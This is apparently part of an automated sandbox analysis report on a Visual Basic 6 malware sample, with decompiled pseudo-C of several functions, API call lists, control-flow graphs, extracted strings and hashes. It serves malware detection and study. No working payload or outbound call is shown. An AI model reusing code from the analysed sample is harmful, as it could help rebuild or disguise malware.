              0x00416eea
              0x00416eec
              0x00416ef1
              0x00416ef4
              0x00416ef9
              0x00416ef9
              0x00416efc
              0x00416f03
              0x00416f0a
              0x00416f0d
              0x00416f0e
              0x00416f1e
              0x00416f28
              0x00416f2d
              0x00416f36
              0x00416f43
              0x00416f60
              0x00416f45
              0x00416f45
              0x00416f4a
              0x00416f4f
              0x00416f54
              0x00416f54
              0x00416f72
              0x00416f8a
              0x00416f8d
              0x00416f8f
              0x00416f9c
              0x00416fbe
              0x00416f9e
              0x00416f9e
              0x00416fa0
              0x00416fa5
              0x00416fab
              0x00416fb1
              0x00416fb6
              0x00416fb6
              0x00416fc8
              0x00416fce
              0x00416fd5
              0x00416fe3
              0x00416fed
              0x00416fee
              0x00416fef
              0x00416ff0
              0x00416fff
              0x00417002
              0x00417004
              0x00417011
              0x00417033
              0x00417013
              0x00417013
              0x00417015
              0x0041701a
              0x00417020
              0x00417026
              0x0041702b
              0x0041702b
              0x0041703d
              0x00417043
              0x0041704d
              0x00417050
              0x00417059
              0x0041705a
              0x00417064
              0x00417065
              0x00417066
              0x00417067
              0x00417068
              0x0041706a
              0x0041706d
              0x00417075
              0x0041707d
              0x0041707d
              0x00417082
              0x00417084
              0x0041708e
              0x00417090
              0x00417090
              0x0041709b
              0x0041709e
              0x0041709f
              0x004170c4
              0x004170cc
              0x004170d1

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416E4C
              • __vbaInStr.MSVBVM60(00000000,00411D88,ABC,00000002,?,?,?,?,004016F6), ref: 00416E7E
              • __vbaChkstk.MSVBVM60 ref: 00416EB7
              • __vbaChkstk.MSVBVM60 ref: 00416EC8
              • __vbaChkstk.MSVBVM60 ref: 00416ED9
              • __vbaLateMemCall.MSVBVM60(?,YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81,00000003), ref: 00416EF4
              • #561.MSVBVM60(00000003), ref: 00416F0E
              • __vbaFreeVar.MSVBVM60(00000003), ref: 00416F28
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00000003), ref: 00416F4F
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000001C), ref: 00416FB1
              • __vbaChkstk.MSVBVM60(?), ref: 00416FE3
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B0C,00000054), ref: 00417026
              • __vbaChkstk.MSVBVM60(00000000,?,00411B0C,00000054), ref: 0041705A
              • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041706D
              • __vbaFreeObj.MSVBVM60(?,00000000), ref: 00417075
              • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0041707D
              • #589.MSVBVM60(00000001,00000003), ref: 00417084
              • __vbaEnd.MSVBVM60(00000001,00000003), ref: 00417090
              • __vbaFreeObj.MSVBVM60(004170D2,00000001,00000003), ref: 004170C4
              • __vbaFreeObj.MSVBVM60(004170D2,00000001,00000003), ref: 004170CC
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Chkstk$Free$CheckHresultLate$#561#589CallNew2
              • String ID: ABC$YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81$bucketeer
              • API String ID: 867805743-4092157262
              • Opcode ID: 5ef7b3acd855ea9292f31c51b5ef10f3da943b531486ad07b969c3a85470a87a
              • Instruction ID: a0d33323be646ac128ea7551ebb7bbb3c542825fc016caf9797205019eac852e
              • Opcode Fuzzy Hash: 5ef7b3acd855ea9292f31c51b5ef10f3da943b531486ad07b969c3a85470a87a
              • Instruction Fuzzy Hash: DB612471900318AFDB11EF54DC46BDEBBB5AF09704F1044AAF508BB2A1C7B95A85DF09
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00415587, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 181COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 378 415587-4155bb __vbaChkstk 379 4155d5 378->379 380 4155bd-4155d3 __vbaNew2 378->380 381 4155dc-4155fc 379->381 380->381 383 415615 381->383 384 4155fe-415613 __vbaHresultCheckObj 381->384 385 415619-41563d 383->385 384->385 387 415659 385->387 388 41563f-415657 __vbaHresultCheckObj 385->388 389 41565d-4156aa __vbaFreeObj #673 __vbaFpR8 387->389 388->389 390 4156b5 389->390 391 4156ac-4156b3 389->391 392 4156b9-4156d0 __vbaFreeVar 390->392 391->392 393 4156d2-4156dc #571 392->393 394 4156df-41571e __vbaI4Str #697 __vbaStrMove __vbaStrCmp __vbaFreeStr 392->394 393->394 395 415724-41572b 394->395 396 4157c8-4157e9 394->396 398 415745 395->398 399 41572d-415743 __vbaNew2 395->399 400 41574c-41576c 398->400 399->400 402 415785 400->402 403 41576e-415783 __vbaHresultCheckObj 400->403 404 415789-4157a3 402->404 403->404 406 4157a5-4157ba __vbaHresultCheckObj 404->406 407 4157bc 404->407 408 4157c0-4157c3 __vbaFreeObj 406->408 407->408 408->396
              C-Code - Quality: 48%
              			E00415587(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int __fp0) {
				intOrPtr _v8;
				signed int* _v12;
				signed int _v24;
				void* _v28;
				char _v32;
				signed int _v40;
				char _v48;
				void* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				signed int _t81;
				signed int _t85;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				char* _t105;
				signed int* _t115;
				signed int _t118;
				signed int _t124;

				_t124 = __fp0;
				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_push(0x5c);
				L004016F0();
				_v12 = _t115;
				_v8 = 0x401550;
				if( *0x4183d8 != 0) {
					_v88 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v88 = 0x4183d8;
				}
				_v68 =  *_v88;
				_t81 =  *((intOrPtr*)( *_v68 + 0x14))(_v68,  &_v32);
				asm("fclex");
				_v72 = _t81;
				if(_v72 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v92 = _t81;
				}
				_v76 = _v32;
				_t85 =  *((intOrPtr*)( *_v76 + 0x138))(_v76, L"Challa", 1);
				asm("fclex");
				_v80 = _t85;
				_t118 = _v80;
				if(_t118 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x411b34);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v96 = _t85;
				}
				_t105 =  &_v32;
				L004018AC();
				_v40 = 1;
				_v48 = 2;
				_push( &_v48);
				asm("fld1");
				_push(_t105);
				_push(_t105);
				 *_t115 = _t124;
				asm("fld1");
				_push(_t105);
				_push(_t105);
				_v72 = _t124;
				asm("fld1");
				_push(_t105);
				_push(_t105);
				_v80 = _t124;
				_push(_t105);
				_push(_t105);
				_v88 =  *0x401548;
				L0040180A();
				L0040193C();
				asm("fcomp qword [0x401540]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t118 == 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_v100 = 1;
				}
				_v68 =  ~_v100;
				L00401912();
				_t89 = _v68;
				if(_t89 != 0) {
					_push(0x30);
					L00401804();
					_v24 = _t89;
				}
				_push(0x411bcc);
				L004017F8();
				_push(_t89);
				L004017FE();
				L00401882();
				_push(_t89);
				_push(0x411918);
				L0040184C();
				asm("sbb eax, eax");
				_v68 =  ~( ~( ~_t89));
				L00401924();
				_t93 = _v68;
				if(_t93 != 0) {
					if( *0x4183d8 != 0) {
						_v104 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v104 = 0x4183d8;
					}
					_v68 =  *_v104;
					_t99 =  *((intOrPtr*)( *_v68 + 0x1c))(_v68,  &_v32);
					asm("fclex");
					_v72 = _t99;
					if(_v72 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4119b8);
						_push(_v68);
						_push(_v72);
						L00401906();
						_v108 = _t99;
					}
					_v76 = _v32;
					_t93 =  *((intOrPtr*)( *_v76 + 0x50))(_v76);
					asm("fclex");
					_v80 = _t93;
					if(_v80 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x411b0c);
						_push(_v76);
						_push(_v80);
						L00401906();
						_v112 = _t93;
					}
					L004018AC();
				}
				asm("wait");
				_push(0x4157ea);
				return _t93;
			}






























              0x00415587
              0x0041558c
              0x00415597
              0x00415598
              0x0041559f
              0x004155a2
              0x004155aa
              0x004155ad
              0x004155bb
              0x004155d5
              0x004155bd
              0x004155bd
              0x004155c2
              0x004155c7
              0x004155cc
              0x004155cc
              0x004155e1
              0x004155f0
              0x004155f3
              0x004155f5
              0x004155fc
              0x00415615
              0x004155fe
              0x004155fe
              0x00415600
              0x00415605
              0x00415608
              0x0041560b
              0x00415610
              0x00415610
              0x0041561c
              0x0041562e
              0x00415634
              0x00415636
              0x00415639
              0x0041563d
              0x00415659
              0x0041563f
              0x0041563f
              0x00415644
              0x00415649
              0x0041564c
              0x0041564f
              0x00415654
              0x00415654
              0x0041565d
              0x00415660
              0x00415665
              0x0041566c
              0x00415676
              0x00415677
              0x00415679
              0x0041567a
              0x0041567b
              0x0041567e
              0x00415680
              0x00415681
              0x00415682
              0x00415685
              0x00415687
              0x00415688
              0x00415689
              0x00415692
              0x00415693
              0x00415694
              0x00415697
              0x0041569c
              0x004156a1
              0x004156a7
              0x004156a9
              0x004156aa
              0x004156b5
              0x004156ac
              0x004156ac
              0x004156ac
              0x004156be
              0x004156c5
              0x004156ca
              0x004156d0
              0x004156d2
              0x004156d4
              0x004156dc
              0x004156dc
              0x004156df
              0x004156e4
              0x004156e9
              0x004156ea
              0x004156f4
              0x004156f9
              0x004156fa
              0x004156ff
              0x00415706
              0x0041570c
              0x00415713
              0x00415718
              0x0041571e
              0x0041572b
              0x00415745
              0x0041572d
              0x0041572d
              0x00415732
              0x00415737
              0x0041573c
              0x0041573c
              0x00415751
              0x00415760
              0x00415763
              0x00415765
              0x0041576c
              0x00415785
              0x0041576e
              0x0041576e
              0x00415770
              0x00415775
              0x00415778
              0x0041577b
              0x00415780
              0x00415780
              0x0041578c
              0x00415797
              0x0041579a
              0x0041579c
              0x004157a3
              0x004157bc
              0x004157a5
              0x004157a5
              0x004157a7
              0x004157ac
              0x004157af
              0x004157b2
              0x004157b7
              0x004157b7
              0x004157c3
              0x004157c3
              0x004157c8
              0x004157c9
              0x00000000

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004155A2
              • __vbaNew2.MSVBVM60(004119C8,004183D8,?,?,?,?,004016F6), ref: 004155C7
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000014), ref: 0041560B
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B34,00000138), ref: 0041564F
              • __vbaFreeObj.MSVBVM60(00000000,?,00411B34,00000138), ref: 00415660
              • #673.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00415697
              • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 0041569C
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 004156C5
              • #571.MSVBVM60(00000030,?,?,?,?,?,?,?,?,00000002), ref: 004156D4
              • __vbaI4Str.MSVBVM60(00411BCC,?,?,?,?,?,?,?,?,00000002), ref: 004156E4
              • #697.MSVBVM60(00000000,00411BCC,?,?,?,?,?,?,?,?,00000002), ref: 004156EA
              • __vbaStrMove.MSVBVM60(00000000,00411BCC,?,?,?,?,?,?,?,?,00000002), ref: 004156F4
              • __vbaStrCmp.MSVBVM60(00411918,00000000,00000000,00411BCC,?,?,?,?,?,?,?,?,00000002), ref: 004156FF
              • __vbaFreeStr.MSVBVM60(00411918,00000000,00000000,00411BCC,?,?,?,?,?,?,?,?,00000002), ref: 00415713
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00411918,00000000,00000000,00411BCC,?,?,?,?,?,?,?,?,00000002), ref: 00415737
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000001C,?,?,?,?,?,?,?,?,00000002), ref: 0041577B
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B0C,00000050,?,?,?,?,?,?,?,?,00000002), ref: 004157B2
              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 004157C3
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckFreeHresult$New2$#571#673#697ChkstkMove
              • String ID: Challa
              • API String ID: 3491129088-2699440810
              • Opcode ID: 8df328e93dd067e389b2e406b4161082c086c7f2e354db0621e7e0b8b3c1f22b
              • Instruction ID: 19ad24a71eaf98a0ec0b509bda51b67f3f1f5aefbcfde93a872e49bd8e89e59e
              • Opcode Fuzzy Hash: 8df328e93dd067e389b2e406b4161082c086c7f2e354db0621e7e0b8b3c1f22b
              • Instruction Fuzzy Hash: 58612AB0D50608EFDB00EF95C849BEEBBB4FF04705F10452AE015BB2A0DBB85986DB19
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00416B95, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 178COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 409 416b95-416bdc __vbaChkstk 411 416bf6 409->411 412 416bde-416bf4 __vbaNew2 409->412 413 416bfd-416c1d 411->413 412->413 415 416c36 413->415 416 416c1f-416c34 __vbaHresultCheckObj 413->416 417 416c3a-416c58 415->417 416->417 419 416c71 417->419 420 416c5a-416c6f __vbaHresultCheckObj 417->420 421 416c75-416ca0 __vbaStrCmp __vbaFreeStr __vbaFreeObj 419->421 420->421 422 416ca2-416cc7 __vbaVarDup #529 __vbaFreeVar 421->422 423 416ccc-416cda #696 421->423 422->423 424 416d11-416d18 423->424 425 416cdc-416cf1 423->425 426 416d32 424->426 427 416d1a-416d30 __vbaNew2 424->427 430 416cf3-416d0b __vbaHresultCheckObj 425->430 431 416d0d 425->431 428 416d39-416d59 426->428 427->428 433 416d72 428->433 434 416d5b-416d70 __vbaHresultCheckObj 428->434 430->424 431->424 435 416d76-416d97 433->435 434->435 437 416db3 435->437 438 416d99-416db1 __vbaHresultCheckObj 435->438 439 416db7-416e06 __vbaStrMove __vbaFreeObj __vbaFreeStr 437->439 438->439
              C-Code - Quality: 58%
              			E00416B95(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				char _v56;
				char* _v64;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				short _v92;
				intOrPtr _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v132;
				signed int _t103;
				signed int _t108;
				char* _t112;
				signed int _t118;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t140;
				void* _t142;
				intOrPtr _t143;

				_t143 = _t142 - 0xc;
				 *[fs:0x0] = _t143;
				L004016F0();
				_v16 = _t143;
				_v12 = 0x401680;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x6c,  *[fs:0x0], 0x4016f6, _t140);
				if( *0x4183d8 != 0) {
					_v108 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v108 = 0x4183d8;
				}
				_v76 =  *_v108;
				_t103 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t103;
				if(_v80 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v112 = _t103;
				}
				_v84 = _v40;
				_t108 =  *((intOrPtr*)( *_v84 + 0x50))(_v84,  &_v36);
				asm("fclex");
				_v88 = _t108;
				if(_v88 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x411b34);
					_push(_v84);
					_push(_v88);
					L00401906();
					_v116 = _t108;
				}
				_push(_v36);
				_push(0);
				L0040184C();
				asm("sbb eax, eax");
				_v92 =  ~( ~_t108 + 1);
				L00401924();
				L004018AC();
				_t112 = _v92;
				if(_t112 != 0) {
					_v64 = L"Subvicarship";
					_v72 = 8;
					L004018A0();
					_t112 =  &_v56;
					_push(_t112);
					L0040188E();
					L00401912();
				}
				_push(0x411918);
				L0040179E();
				if(_t112 != 0x61) {
					_t127 =  *((intOrPtr*)( *_a4 + 0x720))(_a4);
					_v76 = _t127;
					if(_v76 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x720);
						_push(0x41049c);
						_push(_a4);
						_push(_v76);
						L00401906();
						_v120 = _t127;
					}
				}
				if( *0x4183d8 != 0) {
					_v124 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v124 = 0x4183d8;
				}
				_v76 =  *_v124;
				_t118 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t118;
				if(_v80 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v128 = _t118;
				}
				_v84 = _v40;
				_t123 =  *((intOrPtr*)( *_v84 + 0xe8))(_v84,  &_v36);
				asm("fclex");
				_v88 = _t123;
				if(_v88 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x411b34);
					_push(_v84);
					_push(_v88);
					L00401906();
					_v132 = _t123;
				}
				_t124 = _v36;
				_v104 = _t124;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_v28 =  *0x401678;
				asm("wait");
				_push(0x416e07);
				L00401924();
				return _t124;
			}




































              0x00416b98
              0x00416ba7
              0x00416bb1
              0x00416bb9
              0x00416bbc
              0x00416bc3
              0x00416bd2
              0x00416bdc
              0x00416bf6
              0x00416bde
              0x00416bde
              0x00416be3
              0x00416be8
              0x00416bed
              0x00416bed
              0x00416c02
              0x00416c11
              0x00416c14
              0x00416c16
              0x00416c1d
              0x00416c36
              0x00416c1f
              0x00416c1f
              0x00416c21
              0x00416c26
              0x00416c29
              0x00416c2c
              0x00416c31
              0x00416c31
              0x00416c3d
              0x00416c4c
              0x00416c4f
              0x00416c51
              0x00416c58
              0x00416c71
              0x00416c5a
              0x00416c5a
              0x00416c5c
              0x00416c61
              0x00416c64
              0x00416c67
              0x00416c6c
              0x00416c6c
              0x00416c75
              0x00416c78
              0x00416c7a
              0x00416c81
              0x00416c86
              0x00416c8d
              0x00416c95
              0x00416c9a
              0x00416ca0
              0x00416ca2
              0x00416ca9
              0x00416cb6
              0x00416cbb
              0x00416cbe
              0x00416cbf
              0x00416cc7
              0x00416cc7
              0x00416ccc
              0x00416cd1
              0x00416cda
              0x00416ce4
              0x00416cea
              0x00416cf1
              0x00416d0d
              0x00416cf3
              0x00416cf3
              0x00416cf8
              0x00416cfd
              0x00416d00
              0x00416d03
              0x00416d08
              0x00416d08
              0x00416cf1
              0x00416d18
              0x00416d32
              0x00416d1a
              0x00416d1a
              0x00416d1f
              0x00416d24
              0x00416d29
              0x00416d29
              0x00416d3e
              0x00416d4d
              0x00416d50
              0x00416d52
              0x00416d59
              0x00416d72
              0x00416d5b
              0x00416d5b
              0x00416d5d
              0x00416d62
              0x00416d65
              0x00416d68
              0x00416d6d
              0x00416d6d
              0x00416d79
              0x00416d88
              0x00416d8e
              0x00416d90
              0x00416d97
              0x00416db3
              0x00416d99
              0x00416d99
              0x00416d9e
              0x00416da3
              0x00416da6
              0x00416da9
              0x00416dae
              0x00416dae
              0x00416db7
              0x00416dba
              0x00416dbd
              0x00416dc7
              0x00416dcf
              0x00416dda
              0x00416ddd
              0x00416dde
              0x00416e01
              0x00416e06

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416BB1
              • __vbaNew2.MSVBVM60(004119C8,004183D8,?,?,?,?,004016F6), ref: 00416BE8
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000014), ref: 00416C2C
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B34,00000050), ref: 00416C67
              • __vbaStrCmp.MSVBVM60(00000000,?), ref: 00416C7A
              • __vbaFreeStr.MSVBVM60(00000000,?), ref: 00416C8D
              • __vbaFreeObj.MSVBVM60(00000000,?), ref: 00416C95
              • __vbaVarDup.MSVBVM60(00000000,?), ref: 00416CB6
              • #529.MSVBVM60(?,00000000,?), ref: 00416CBF
              • __vbaFreeVar.MSVBVM60(?,00000000,?), ref: 00416CC7
              • #696.MSVBVM60(00411918,00000000,?), ref: 00416CD1
              • __vbaHresultCheckObj.MSVBVM60(00000000,00401680,0041049C,00000720), ref: 00416D03
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00411918,00000000,?), ref: 00416D24
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000014), ref: 00416D68
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B34,000000E8), ref: 00416DA9
              • __vbaStrMove.MSVBVM60(00000000,?,00411B34,000000E8), ref: 00416DC7
              • __vbaFreeObj.MSVBVM60(00000000,?,00411B34,000000E8), ref: 00416DCF
              • __vbaFreeStr.MSVBVM60(00416E07), ref: 00416E01
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckFreeHresult$New2$#529#696ChkstkMove
              • String ID: Subvicarship
              • API String ID: 3028026186-131754160
              • Opcode ID: ac22360466e2fd7e2c315cf7d0dcafeb7954673494826b56f85c2314ecf88f1a
              • Instruction ID: 74920a7faaad9c4060d05befc445274aaa652f38e4bb3b10ee5eb9ca904aa1f2
              • Opcode Fuzzy Hash: ac22360466e2fd7e2c315cf7d0dcafeb7954673494826b56f85c2314ecf88f1a
              • Instruction Fuzzy Hash: 1071F271D00208AFDF10EFA5C945BDDBBB0BF08705F24842AE415BB2A1DBB99985DF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00414D17, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 140COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 441 414d17-414d92 __vbaChkstk __vbaStrCopy #712 __vbaStrMove __vbaStrCmp 443 414e01-414e08 441->443 444 414d94-414de1 __vbaFpI4 441->444 445 414e22 443->445 446 414e0a-414e20 __vbaNew2 443->446 449 414de3-414dfb __vbaHresultCheckObj 444->449 450 414dfd 444->450 448 414e29-414e49 445->448 446->448 452 414e62 448->452 453 414e4b-414e60 __vbaHresultCheckObj 448->453 449->443 450->443 454 414e66-414e87 452->454 453->454 456 414ea3 454->456 457 414e89-414ea1 __vbaHresultCheckObj 454->457 458 414ea7-414ec4 __vbaFreeObj __vbaLenBstr 456->458 457->458 459 414ec6-414edc __vbaInStr 458->459 460 414edf-414efe __vbaFreeStr 458->460 459->460
              C-Code - Quality: 52%
              			E00414D17(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v28;
				short _v32;
				short _v36;
				char _v40;
				void* _v44;
				void* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v76;
				void* _v80;
				signed int _v84;
				signed int _v88;
				void* _t59;
				signed int _t65;
				signed int _t70;
				short _t71;
				signed int _t74;
				char* _t77;
				void* _t84;
				void* _t86;
				intOrPtr* _t87;

				_t87 = _t86 - 0xc;
				 *[fs:0x0] = _t87;
				L004016F0();
				_v16 = _t87;
				_v12 = 0x4014e0;
				_v8 = 0;
				_t59 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x4016f6, _t84);
				L004018F4();
				_push(0);
				_push(0xffffffff);
				_push(1);
				_push(0);
				_push(0x411918);
				_push(_v40);
				L00401840();
				_t77 =  &_v40;
				L00401882();
				_push(_v40);
				_push(0x411b2c);
				L0040184C();
				if(_t59 != 0) {
					L0040183A();
					_v80 =  *0x4014d4;
					_v84 =  *0x4014d0;
					_v88 =  *0x4014cc;
					 *_t87 =  *0x4014c8;
					_t74 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t77, _t77, _t77, _t77, _t59);
					asm("fclex");
					_v52 = _t74;
					if(_v52 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x41046c);
						_push(_a4);
						_push(_v52);
						L00401906();
						_v76 = _t74;
					}
				}
				if( *0x4183d8 != 0) {
					_v80 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v80 = 0x4183d8;
				}
				_v52 =  *_v80;
				_t65 =  *((intOrPtr*)( *_v52 + 0x14))(_v52,  &_v44);
				asm("fclex");
				_v56 = _t65;
				if(_v56 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v52);
					_push(_v56);
					L00401906();
					_v84 = _t65;
				}
				_v60 = _v44;
				_t70 =  *((intOrPtr*)( *_v60 + 0x108))(_v60,  &_v48);
				asm("fclex");
				_v64 = _t70;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x411b34);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v88 = _t70;
				}
				_t71 = _v48;
				_v36 = _t71;
				L004018AC();
				_push(0x411b48);
				L00401834();
				if(_t71 != 1) {
					_push(0xff8d5482);
					_push(L"samtaleemnetsrhes");
					_push(L"Hofdesserternes7");
					_push(0);
					L0040182E();
					_v28 = _t71;
				}
				_v32 = 0x1e2c;
				asm("wait");
				_push(0x414eff);
				L00401924();
				return _t71;
			}





























              0x00414d1a
              0x00414d29
              0x00414d33
              0x00414d3b
              0x00414d3e
              0x00414d45
              0x00414d54
              0x00414d5f
              0x00414d64
              0x00414d66
              0x00414d68
              0x00414d6a
              0x00414d6c
              0x00414d71
              0x00414d74
              0x00414d7b
              0x00414d7e
              0x00414d83
              0x00414d86
              0x00414d8b
              0x00414d92
              0x00414d9a
              0x00414da7
              0x00414db1
              0x00414dbb
              0x00414dc5
              0x00414dd2
              0x00414dd8
              0x00414dda
              0x00414de1
              0x00414dfd
              0x00414de3
              0x00414de3
              0x00414de8
              0x00414ded
              0x00414df0
              0x00414df3
              0x00414df8
              0x00414df8
              0x00414de1
              0x00414e08
              0x00414e22
              0x00414e0a
              0x00414e0a
              0x00414e0f
              0x00414e14
              0x00414e19
              0x00414e19
              0x00414e2e
              0x00414e3d
              0x00414e40
              0x00414e42
              0x00414e49
              0x00414e62
              0x00414e4b
              0x00414e4b
              0x00414e4d
              0x00414e52
              0x00414e55
              0x00414e58
              0x00414e5d
              0x00414e5d
              0x00414e69
              0x00414e78
              0x00414e7e
              0x00414e80
              0x00414e87
              0x00414ea3
              0x00414e89
              0x00414e89
              0x00414e8e
              0x00414e93
              0x00414e96
              0x00414e99
              0x00414e9e
              0x00414e9e
              0x00414ea7
              0x00414eab
              0x00414eb2
              0x00414eb7
              0x00414ebc
              0x00414ec4
              0x00414ec6
              0x00414ecb
              0x00414ed0
              0x00414ed5
              0x00414ed7
              0x00414edc
              0x00414edc
              0x00414edf
              0x00414ee5
              0x00414ee6
              0x00414ef9
              0x00414efe

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414D33
              • __vbaStrCopy.MSVBVM60(?,?,?,?,004016F6), ref: 00414D5F
              • #712.MSVBVM60(00000000,00411918,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414D74
              • __vbaStrMove.MSVBVM60(00000000,00411918,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414D7E
              • __vbaStrCmp.MSVBVM60(00411B2C,00000000,00000000,00411918,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414D8B
